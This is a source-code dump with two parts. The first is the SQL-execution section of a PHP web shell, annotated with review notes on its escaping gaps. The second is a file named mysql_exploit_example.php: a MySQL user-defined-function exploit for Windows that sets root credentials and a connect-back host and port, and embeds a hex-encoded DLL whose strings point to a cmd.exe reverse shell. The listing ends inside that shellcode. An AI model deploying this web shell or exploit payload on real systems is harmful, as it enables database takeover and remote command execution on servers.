153 | if ($this->query('SELECT * FROM `' . $table . '`') != 1) return 0;
154 | if (! $this->get_result()) return 0;
155 | for ($i = 0; $i < $this->num_rows; $i++){
156 | foreach ($this->rows[$i] as $k => $v){
157 | $this->rows[$i][$k] = @mysql_real_escape_string($v);
158 | }
159 | $this->dump[] = 'INSERT INTO `' . $table . '` (`' . @implode("`, `", $this->columns) . '`) VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
160 | }
161 | break;
162 | case 'MSSQL':
163 | $this->dump[0] = '## MSSQL dump';
164 | if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
165 | if (! $this->get_result()) return 0;
166 | for ($i = 0; $i < $this->num_rows; $i++){
167 | foreach ($this->rows[$i] as $k => $v){
168 | $this->rows[$i][$k] = @addslashes($v);
169 | }
170 | $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
171 | }
172 | break;
173 | case 'PostgreSQL':
174 | $this->dump[0] = '## PostgreSQL dump';
175 | if ($this->query('SELECT * FROM ' . $table) != 1) return 0;
176 | if (! $this->get_result()) return 0;
177 | for ($i = 0; $i < $this->num_rows; $i++){
178 | foreach ($this->rows[$i] as $k => $v){
179 | $this->rows[$i][$k] = @addslashes($v);
180 | }
181 | $this->dump[] = 'INSERT INTO ' . $table . ' (' . @implode(", ", $this->columns) . ') VALUES (\'' . @implode("', '", $this->rows[$i]) . '\');';
182 | }
183 | break;
184 | case 'Oracle':
185 | $this->dump[0] = '## ORACLE dump';
186 | $this->dump[] = '## under construction';
187 | break;
188 | default:
189 | return 0;
190 | break;
191 | }
192 |
193 | return 1;
194 | }
195 | */
196 |
// SQL section of the PHP shell, as far as this listing shows it. It dispatches on the request array $p:
//   - $p['code'] set: connect with the type/host/user/pass taken from the same request and run each
//     '{;}'-separated statement, rendering the results into $sBuff, which is handed to sAjax().
//   - else $p['host'] set: connect and list databases and tables for the chosen backend.
//   - else: build the list of database drivers this PHP build exposes.
// Every statement in $p['code'] reaches sql_query() unmodified except for the pagination placeholders,
// so the privileges of the database account and the database's own audit log are the only controls
// on what was run through this code.
// NOTE(review): $p, $config, hsc(), tText(), sAjax(), genPaginator() and the sql_* helpers are defined
// outside this section; what is said about them below is inferred from how they are called - confirm.
// NOTE(review): the gutter skips 242-245 and 317-324, and the HTML inside the string literals appears
// to have been stripped by extraction, so the markup shown here is incomplete.
197 | if (isset($p['code'])){
198 | if (!isset($p['pg'])) $p['pg'] = 1;
// Row offset for the requested page; the page number is cast to int before it is used.
199 | $start = ((int)$p['pg'] - 1) * $config['SQLLimit'];
200 | $oracleLimit = $start + $config['SQLLimit'];
201 |
202 | $sBuff = '';
// NOTE(review): unlike the browse branch below, $con is not compared with false here and
// sql_close() is not called anywhere in this branch.
203 | $con = sql_connect($p['type'], $p['host'], $p['user'], $p['pass']);
// Statements are separated by the literal token '{;}'; pieces that are empty after trim() are skipped.
204 | foreach(explode('{;}', $p['code']) as $query){
205 | if (trim($query) !== ''){
// Pagination placeholders are replaced textually; nothing else in the statement is altered.
206 | $query = str_replace(array('{start}', '{limit}', '{oraclelimit}'), array($start, $config['SQLLimit'], $oracleLimit), $query);
// The statement is echoed back through hsc() (presumably an HTML-escaping helper) before it is run.
207 | $sBuff .= '
' . tText('sq8', 'Executed') . ': ' . hsc($query) . '; ';
208 | $res = sql_query($p['type'], $query, $con);
// A result that is neither false nor another boolean is rendered as a table of rows.
209 | if ($res !== false && !is_bool($res)){
210 | $tmp = "
";
211 |
// Header row: one cell per field name, each passed through hsc().
212 | $t = sql_num_fields($p['type'], $res, $con);
213 | for ($i = 0; $i < $t; $i++)
214 | $tmp .= '' . @hsc(sql_field_name($p['type'], $res, $i)) . ' | ';
215 | $tmp .= '
';
216 |
// $c counts the rows fetched; it decides the paginator argument below.
217 | $c = 0;
218 |
219 | while($rows = sql_fetch_data($p['type'], $res)){
220 | $c++;
221 | $tmp .= '';
// Each cell value is passed through hsc() before it is appended.
222 | foreach($rows as $r)
223 | $tmp .= '' . @hsc($r) . ' | ';
224 | $tmp .= '
';
225 | }
226 |
// Second argument is the current page when fewer than SQLLimit rows came back, otherwise -1.
227 | $pag = genPaginator($p['pg'], ($c < $config['SQLLimit'] ? $p['pg'] : -1), false) . '';
228 | $sBuff .= "[ ok ]
{$pag}
{$tmp}
{$pag}
";
229 | unset($c, $tmp);
// On failure $res is false, which interpolates as an empty string, so the parentheses stay empty
// and no driver error text is shown.
230 | } else if ($res === false)
231 | $sBuff .= "[ ERROR ] ({$res})
";
232 | else
233 | $sBuff .= "[ ok ] ({$res})
";
234 | }
235 | }
236 |
237 | sAjax($sBuff);
238 | } else if (isset($p['host'])){
// Browse mode: connect with the request-supplied credentials, then enumerate databases and tables.
239 | $con = sql_connect($p['type'], $p['host'], $p['user'], $p['pass']);
240 | if ($con !== false){
// NOTE(review): $sBuff is appended to without being initialised in this branch - presumably it is
// set by the including file; confirm.
241 | $sBuff .= '
246 | ' . mSubmit(tText('go', 'Go!'), 'dbexec(euc(d.getElementById("code").value))') . '
247 | ' . tText('sq4', 'Separate multiple commands with') . ' {;} ' . tText('sq9', 'Variables for use in pagination') . ' {start}, {limit}, {oraclelimit}
248 |
249 | ';
250 |
// No catalog listing is attempted for the pdo and odbc types.
251 | if (($p['type']!=='pdo') && ($p['type']!=='odbc')){
// One catalog query per backend. For sqlite/sqlite3 the value of $p['host'] is interpolated
// directly into a quoted SQL literal (presumably host carries the database file path - confirm).
252 | if ($p['type']==='mssql') $showdb = 'SELECT name FROM master..sysdatabases';
253 | else if ($p['type']==='pgsql') $showdb = 'SELECT schema_name FROM information_schema.schemata';
254 | else if ($p['type']==='oracle') $showdb = 'SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME';
255 | else if ($p['type']==='sqlite' || $p['type']==='sqlite3') $showdb = "SELECT '{$p['host']}'";
256 | else $showdb = 'SHOW DATABASES'; //mysql
257 |
258 | $res = sql_query($p['type'], $showdb, $con);
259 | if ($res !== false){
260 | $bg = 0;
261 | while($rowarr = sql_fetch_data($p['type'], $res)){
262 | foreach($rowarr as $rows){
// NOTE(review): $rows is a name returned by the database server and is appended to the output
// without hsc(), unlike the result cells in the query branch above.
263 | $sBuff .= ' '.$rows.' ';
264 |
// The same name is interpolated into the per-database table query without quoting or escaping.
265 | if($p['type']==='mssql') $showtbl = "SELECT name FROM {$rows}..sysobjects WHERE xtype = 'U'";
266 | else if($p['type']==='pgsql') $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='{$rows}'";
267 | else if($p['type']==='oracle') $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='{$rows}'";
268 | else if($p['type']==='sqlite' || $p['type']==='sqlite3') $showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
269 | else $showtbl = "SHOW TABLES FROM {$rows}"; //mysql
270 |
271 | $res_t = sql_query($p['type'], $showtbl, $con);
272 | if ($res_t != false){
273 | while($tablearr = sql_fetch_data($p['type'], $res_t)){
274 | foreach($tablearr as $tables){
// Per-backend "dump this table" statement templates that keep the pagination placeholders.
// NOTE(review): $dumptbl is assigned but its use is not visible here; the markup at gutter 281 that
// presumably carried it appears stripped. The Oracle template writes (oraclelimit) in parentheses,
// which the substitution at gutter 206 does not replace; the literal is a stable string for static matching.
275 | if ($p['type']==='mssql') $dumptbl = "SELECT TOP 100 * FROM {$rows}..{$tables}"; //TODO
276 | else if ($p['type']==='pgsql') $dumptbl = "SELECT * FROM {$rows}.{$tables} LIMIT {limit} OFFSET {start}";
277 | else if ($p['type']==='oracle') $dumptbl = "SELECT * FROM {$rows}.{$tables} WHERE ROWNUM BETWEEN {start} AND (oraclelimit);";
278 | else if ($p['type']==='sqlite' || $p['type']==='sqlite3') $dumptbl = "SELECT * FROM {$tables} LIMIT {start}, {limit}";
279 | else $dumptbl = "SELECT * FROM {$rows}.{$tables} LIMIT {start}, {limit}"; //mysql
280 |
// Table names are likewise appended to the output without hsc().
281 | $sBuff .= '' . $tables . ' | ';
282 | }
283 | }
284 | }
285 | $sBuff .= ' ';
286 | }
287 | }
288 | }
289 | }
290 |
291 | $sBuff .= ' |
292 | |
293 |
';
// When $p['sqlinit'] is present a hidden 'jseval' field carrying a client-side call is appended.
294 | if (isset($p['sqlinit'])) $sBuff .= mHide('jseval', 'dbhistory("s");');
295 |
296 | sql_close($p['type'], $con);
297 | } else
298 | $sBuff .= sDialog('Unable to connect to database');
299 | } else {
// No query and no host: probe which database extensions exist and offer those as connection types.
// NOTE(review): the Oracle probe at gutter 304 tests the name 'oci_connect]' (with a stray bracket),
// which cannot name a function, so as written that entry is never added.
300 | $sqllist = array();
301 | if (function_exists('mysql_connect') || function_exists('mysqli_connect')) $sqllist['mysql'] = 'MySQL [using mysql_* or mysqli_*]';
302 | if (function_exists('mssql_connect') || function_exists('sqlsrv_connect')) $sqllist['mssql'] = 'MsSQL [using mssql_* or sqlsrv_*]';
303 | if (function_exists('pg_connect')) $sqllist['pgsql'] = 'PostgreSQL [using pg_*]';
304 | if (function_exists('oci_connect]')) $sqllist['oracle'] = 'Oracle [using oci_*]';
305 | if (function_exists('sqlite_open')) $sqllist['sqlite'] = 'SQLite [using sqlite_*]';
306 | if (class_exists('SQLite3')) $sqllist['sqlite3'] = 'SQLite3 [using class SQLite3]';
307 | if (function_exists('odbc_connect')) $sqllist['odbc'] = 'ODBC [using odbc_*]';
308 | if (class_exists('PDO')) $sqllist['pdo'] = 'PDO [using class PDO]';
309 |
310 | $sBuff .= '
311 |
312 |
313 |
' . tText('sql', 'SQL') . '
314 |
315 |
316 |
Or use www.adminer.org
325 |
';
326 | }
--------------------------------------------------------------------------------
/examples/mysql_exploit_example.php:
--------------------------------------------------------------------------------
1 |
2 | /*************************************
3 | ** Mysql function exp (only for win��
4 | ** By SuperHei_at_www.ph4nt0m.org
5 | ** �õ�һ���������ӵ�shell
6 | *************************************
7 | */
8 | //mysql����
9 | $host='localhost';
10 | $user='root';
11 | $pass='';
12 | $gt_db='mysql';
13 | //shell����
14 | $chost='127.0.0.1';
15 | $cport='12345';
16 | //$shellcode by Mix
17 | $shellcode="0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000350540DF71642E8C71642E8C71642E8C997B248C74642E8C137B3D8C74642E8C71642F8C6A642E8C997B258C70642E8C997B2A8C72642E8C5269636871642E8C000000000000000000000000000000000000000000000000504500004C010400014736420000000000000000E0000E210B010600001000000030000000000000AB14000000100000002000000000001000100000001000000400000001000000040000000000000000500000001000000000000002000000000010000010000000001000001000000000000010000000502200007A0000007020000050000000000000000000000000000000000000000000000000000000004000007000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000700000000000000000000000000000000000000000000000000000002E746578740000006E050000001000000010000000100000000000000000000000000000200000602E72646174610000CA020000002000000010000000200000000000000000000000000000400000402E646174610000005C000000003000000010000000300000000000000000000000000000400000C02E72656C6F630000AE000000004000000010000000400000000000000000000000000000400000420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008B4424088B400483380074328B480485C9742B5657BF1030001083C9FF33C0F2AEF7D12BF9B0018BD18BF78B7C2414C1E902F3A58BCA83E103F3A45F5EC38B442404C60001C740082000000032C0C390C39090909090909090909090909090908B44240881EC780400008B40085355568B48048B305751FF153420001033ED83C4043BF575178B94249C0400005F5E5DC6020133C05B81C478040000C35066C74424400200E850030000566689442442E83F030000BB0100000055536A028944244CE8270300008BF083FEFF8974241C0F84DB0200008D4424206A04506A0468FFFF000056895C2434E8FA0200008D4C243C6A105156E8E702000085C074203BF50F84AA02000056E8CF0200008B8424940400005F5E5D5B81C478040000C38B35282000108D542430558D44242C528D4C241C5051C74424400C000000896C2444895C2448FFD68D542430558D44241C528D4C242C5051FFD6B91100000033C08D7C244C8B542424F3AB8B4424288D4C244C898424880000008984248C0000008D842490000000899424840000005051555555535555684030001055C78424A0000000010100006689AC24A400000089AC249000000089AC248C00000089AC248800000089AC2484000000896C247889AC24A80000006689AC24A6000000C744247444000000FF152420001085C07518FF15202000108B8424940400005F5E5D5B81C478040000C38B5424248B351C20001052FFD68B44242850FFD655555355FF15182000108BF05689742430FF151420001068C8000000FF15102000105556FF150C20001085C00F84140100008B442414558D4C241455518D9424AC00000068E8030000525033F6896C2428FF150820001085C00F84DF0000008B4424103BC58BD874528B4424148D4C241055518D9424A800000068E80300005250FF150420001085C00F84AF0000008B4424103BC5742476228B54241C558D8C24A4000000505152E80D0100003BC5760203F08B4424103BF072DEB9FA00000033C08DBC24A00000006A64F3ABFF15102000103BDD0F8557FFFFFF837C2410FF74648B4C241C558D8424A400000068E80300005051E8BA0000003BC589442420744483F8FF743F8B4C24188D5424105552508D8424AC0000005051FF15002000106A64FF15102000108B54242C5552FF150C20001085C0740DE9F4FEFFFFC7442410FFFFFFFF8D4424105550BF3830001083C9FF33C0F2AEF7D149518B4C242468383
0001051FF150020001068C8000000FF15102000108B5424148B351C20001052FFD68B44241850FFD68B4C241C51E82B0000008B8424940400005F5E5D5B81C478040000C390909090909090909090909090FF255C200010FF2564200010FF2560200010FF2568200010FF2558200010FF2554200010FF2550200010FF254C2000108B44240885C0750E3905483000107E2EFF0D483000108B0D3820001083F8018B09890D4C300010753F6880000000FF153C20001085C059A354300010750433C0EB66832000A15430001068043000106800300010A350300010E8EA000000FF05483000105959EB3D85C07539A15430001085C074308B0D50300010568D71FC3BF072128B0E85C97407FFD1A15430001083EE04EBEA50FF154420001083255430001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D4830001000EB2683FE01740583FE027522A15830001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E85300000083FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A15830001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF2540200010837C2408017513833D5830001000750AFF742404FF152C2000106A0158C20C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000302100003C21000048210000582100006E210000762100008421000094210000A2210000B2210000C42100002E22000000000000EC2100001E22000014220000082200000022000000000000090000800B00008017000080150000801000008003000080130000800400008000000000C02000000000000000000000D2210000002000000C2100000000000000000000E02100004C200000F42000000000000000000000F4210000342000000000000000000000000000000000000000000000302100003C21000048210000582100006E210000762100008421000094210000A2210000B2210000C42100002E22000000000000EC2100001E22000014220000082200000022000000000000090000800B00008017000080150000801000008003000080130000800400008000000000DF02577269746546696C650018025265616446696C650000F9015065656B4E616D65645069706500CE0257616974466F7253696E676C654F626A656374009602536C656570002B0252657365744576656E74000031004372656174654576656E744100001B00436C6F736548616E646C65001A014765744C6173744572726F720000440043726561746550726F6365737341000043004372656174655069706500004B45524E454C33322E646C6C00005753325F33322E646C6C00003D0261746F6900004D53564352542E646C6C00005E026672656500000F015F696E69747465726D0091026D616C6C6F6300009D005F61646A7573745F6664697600005D0044697361626C655468726561644C69627261727943616C6C730000000000000000000000014736420000000096220000010000000300000003000000782200008422000090220000601000005010000000100000A0220000AA220000BB2200000000010002004D595544462E646C6C006D79636F6E6E656374006D79636F6E6E6563745F6465696E6974006D79636F6E6E6563745F696E6974000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005858582829207265717569726573206120737472696E6720616E6420616E20696E74656765720000657869740A000000636D642E657865000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000